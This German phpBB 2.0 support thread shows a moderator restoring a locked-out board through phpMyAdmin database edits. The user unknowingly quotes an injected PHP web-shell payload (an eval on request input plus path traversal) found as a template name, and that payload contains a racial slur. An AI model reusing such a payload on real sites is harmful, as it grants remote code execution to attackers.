Problem mit Style

Alles zu Styles, Templates, Icons und Smilies für phpBB 2.0, sowie allgemeine Designfragen zur Integration von phpBB in bestehende Websites.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.0, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
[NCT]Sine
Mitglied

Problem mit Style

Beitrag von [NCT]Sine »

Hallo zusammen,

als ich auf unser Forum zugreifen wollte, musste ich feststellen, dass mein alter Style auf einmal weg war und durch SubSilver ersetzt wurde.

Also bin ich in den Adminbereich gegangen und habe den Board-Style FI Black gewählt. Jetzt fängt das Problem an, denn, jetzt kann ich gar nicht mehr auf das Forum zugreifen.

Das einzige was von meinem Forum "übrig" ist, ist diese Fehlermeldung:

Ich weiß mir leider nicht zu helfen :(. Weiß einer von euch, wo und wie ich ein meinetwegen Standart-Template einrichten kann?

Ich muss dazu sagen, ich bin absolut kein Profi.. leider. Eine etwas ausfühliche Beschreibung wäre daher echt super.

Lieben Dank für eure Hilfe :).
Zuletzt geändert von [NCT]Sine am 15.06.2005 01:31, insgesamt 1-mal geändert.
Markus67
Ehrenadmin
Beitrag von Markus67 »

Hi ...

Hat du KB:phpmyadmin zur Verfügung?

Markus
[NCT]Sine
Mitglied

Beitrag von [NCT]Sine »

Hallo Markus,

lieben Dank für die schnelle Antwort. Leider habe ich das Tool nicht - ich kann nur auf der FTP-Schiene hantieren.. also auf die Files/Codes zugreifen... :(.
Markus67
Ehrenadmin
Beitrag von Markus67 »

Hi ...

du brauchst aber KB:phpmyadmin .... mit FTP bekommen wir das Problem nicht in den Griff. Du musst dazu direkt auf die DB zugreifen können.

Lade dir das Tool einfach runter und installiere es auf deinem Webspace .... eine Anleitung findest du im obigen Artikel.

Markus
[NCT]Sine
Mitglied

Beitrag von [NCT]Sine »

OKi, mache es gerade.
[NCT]Sine
Mitglied

Beitrag von [NCT]Sine »

Sodele :)

Tool ist drauf, und drin bin ich. Leider weiß ich nun nicht, wie ich das Problem beheben soll :(.

Ich hab zwei Templates laut dem Tool (obwohl ich eigentlich 4 habe). SubSilver und die oben gepostete Fehlermeldung aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file *hust*.

Würde es den Fehler beheben, wenn ich Template 2 einfach lösche, sodass Template 1, also SubSilver, verwendet wird?
Markus67
Ehrenadmin
Beitrag von Markus67 »

Hi ...

Als erstes öffnest du die Tabelle phpbb_themes.
Den betroffenen Style Fiblack löschst du komplett
Schau in der Tabelle bitte auch nach welche themes_id subSilver hat.

Dann gehst du in die Tabelle phpbb_config
Folgende Felder müssen verändert werden:
Feld: override_user_style ... eine 1 eintragen (das Feld ist auf der 1. Seite der Tabelle)
Feld: default_style ... die themes_id von subSilver eintragen ... ich vermute mal auch die 1 (das Feld ist auf der 2. Seite der Tabelle)

Danach solltest du dich wieder normal einloggen können. Und dann gehst an die Updates :wink:

Markus
[NCT]Sine
Mitglied

Beitrag von [NCT]Sine »

Herzlichen Dank :D
Funktioniert alles wieder einwandfrei.

*Freu*
Markus67
Ehrenadmin
Beitrag von Markus67 »

Hi ...

Die Frage ist nur wie lange :wink:

Welche phpBB Version nutzt du ... du solltest dringend updaten.

Zusätzlicher Schutz des phpBB-Verzeichnisses durch .htaccess

Markus
Antworten

Zurück zu „phpBB 2.0: Styles, Templates und Grafiken“